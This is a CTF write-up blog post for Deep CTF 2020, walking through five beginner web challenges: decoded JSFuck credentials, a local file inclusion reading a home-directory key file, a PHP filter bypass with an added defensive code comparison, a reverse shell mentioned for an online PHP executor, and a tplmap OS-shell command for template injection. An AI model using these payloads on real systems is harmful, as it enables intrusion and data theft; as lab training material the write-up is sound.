🇮🇳Deep CTF 2020 Writeup

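Author: 颖奇L’Amore

Blog: www.gem-love.com

This competition was not listed on CTFTime, so probably not many people know about it. I was pulled into it by an international friend I know.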

When you feel that you are lost, do not give up, fight and move on. Being a hacker is not easy, it requires effort and sacrifice. But remember … we are legion!


Oh JS! (120pt)

This is the most secure login form on earth.

We use SECURITY BY OBSCURITY in order to prevent hackers from finding our flags.

I dare you to login.

http://140.238.254.6:8002

Author: whitex

Topic: JSFuck

Difficulty: baby

Opening the challenge shows a login form. Viewing the page source reveals JSFuck, which decodes to:

if (document.forms[0].username.value == "corb3nik" && document.forms[0].password.value == "chickenachos") document.location = "4d4932602a75414640946d38ea6fefbf.php"

So visiting 4d4932602a75414640946d38ea6fefbf.php directly gives the flag: d33p{g0tta_kn0w_y0ur_J4v4Scr1pt}


Did You Got Trolled? (120pt)

An army of hackers has stolen the flag from our rabbits. Security experts have failed to capture the flag and some have even gone mad.

Please…GIMME THE FLAG!!

http://140.238.254.6:8005

Author: whitex

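Topic: Recon

Difficulty: trolling

I didn't solve it. I was always one step short and couldn't find key1. This was the second-easiest challenge by difficulty, yet it had the lowest number of solves; probably everyone else, like me, couldn't find key1.

First, robots.txt reveals deep.php. Visiting it looks like this:

I suspected a file inclusion. This page contains a comment: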

<!--Creds in /home/ubuntu/key2.txt -->

So first read out key2:

/deep.php?page=/home/ubuntu/key2.txt

key2 = flag0x085927

But I could not find Key1 no matter what. Later I started looking at the CSS and found the following comment in clean-blog.css:

/* 
 * What is this doing here?
 * Key1 = gimme0x038792
 * 
 */

Take the keys to the generate form:

Clicking GENERATE gives the flag: D33P{h3r3_1s_y0ur_7r0ll_fl4g}


Magic Word! (150pt)

Are you mad enough to get the flag?

http://140.238.254.6:8004/

Author: whitex

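Topic: PHP

Difficulty: easy

I have done the original version of this challenge before, though I forget which foreign competition it was from. This one has the same format and everything as the original, just with a different name. The source is provided: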

<?php
  require("flag.php");

  if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    die();
  }

  if (isset($_GET['magic_word'])) {

    $what_he_said = $_GET['magic_word'];
    $what_you_dont_want_to_hear = 'd33p';
    $what_you_actually_heard = preg_replace(
            "/$what_you_dont_want_to_hear/", '', $what_he_said);

    if ($what_you_actually_heard === $what_you_dont_want_to_hear) {
      get_mad_and_give_flag();
    }
  }
?>

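Nesting the filtered word inside itself (a double-write bypass) is enough. preg_replace makes a single pass, so removing the inner d33p from d3d33p3p leaves d33p:

?magic_word=d3d33p3p

flag: d33p{d33p_p33d}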
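
The single-pass stripping in the source above, next to two stricter ways to handle a forbidden token, as an added example that is not part of the challenge or of the original post. The function names and the sample inputs are constructed for illustration; only the token d33p and the preg_replace call come from the challenge source.

```php
<?php
// Added example (not the challenge's code): single-pass blacklist stripping
// compared with two stricter ways of handling a forbidden token.

const FORBIDDEN = 'd33p'; // token taken from the challenge source

// Same behaviour as the challenge: one pass of preg_replace over the input.
// Deleting a match can splice the bytes around it into a new match.
function strip_once(string $input): string
{
    return preg_replace('/' . preg_quote(FORBIDDEN, '/') . '/', '', $input);
}

// Hypothetical fix 1: repeat the strip until the output stops changing,
// so the result can never contain the token.
function strip_until_stable(string $input): string
{
    do {
        $before = $input;
        $input = strip_once($input);
    } while ($input !== $before);
    return $input;
}

// Hypothetical fix 2 (preferred): do not rewrite the input, reject it.
function is_acceptable(string $input): bool
{
    return strpos($input, FORBIDDEN) === false;
}

// Constructed sample inputs: plain, nested once, nested twice, harmless.
$samples = ['d33p', 'd3d33p3p', 'd3d3d33p3p3p', 'hello'];

foreach ($samples as $s) {
    printf(
        "%-14s once=%-12s stable=%-8s accepted=%s\n",
        $s,
        var_export(strip_once($s), true),
        var_export(strip_until_stable($s), true),
        is_acceptable($s) ? 'yes' : 'no'
    );
}
```

For the nested inputs, strip_once still returns a string containing the token, while strip_until_stable returns an empty string and is_acceptable rejects them outright.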


Nothing is Impossible (160pt)

One of our rabbits has lost the keys of his server to access his flag. He is crying desperately as he only remembers that the flag was in the path: /tmp/flag.php but he doesn't know how to get there. Our friend BugsBunny was performing reconnaissance tasks when suddenly found a web that could help you, please bring me back his flag.

Author: whitex

http://140.238.254.6:8003

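Topic: RCE

Difficulty: easy

The challenge is an online PHP code executor. It tells you the flag is at /tmp/flag.php, but show_source() cannot read it directly, and system() with cat cannot read it either.

Popping a reverse shell yields the flag: d33p{f4st_CG1_SSRF_p0w3r!!}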


Greetings! (200pt)

Feed your ‘name’ to the website and hack!

http://140.238.254.6:8011

Author: SherlockHolmes

Topic: SSTI

Difficulty: easy

I found a template injection.

Throw it at tplmap and let the tool do the work. It detects a blind shell, so pop a shell back:

sudo python tplmap.py -u http://140.238.254.6:8011/\?name\= --os-shell

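This shell disconnects almost immediately. It only stays open for 20 seconds, so once it connects back you have to read the flag right away.

flag: d33p{I_<3_3000}

Original article by 颖奇L'Amore. When reposting, please credit the author and link to the article.

Link to this article: https://www.gem-love.com/ctf/2232.html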
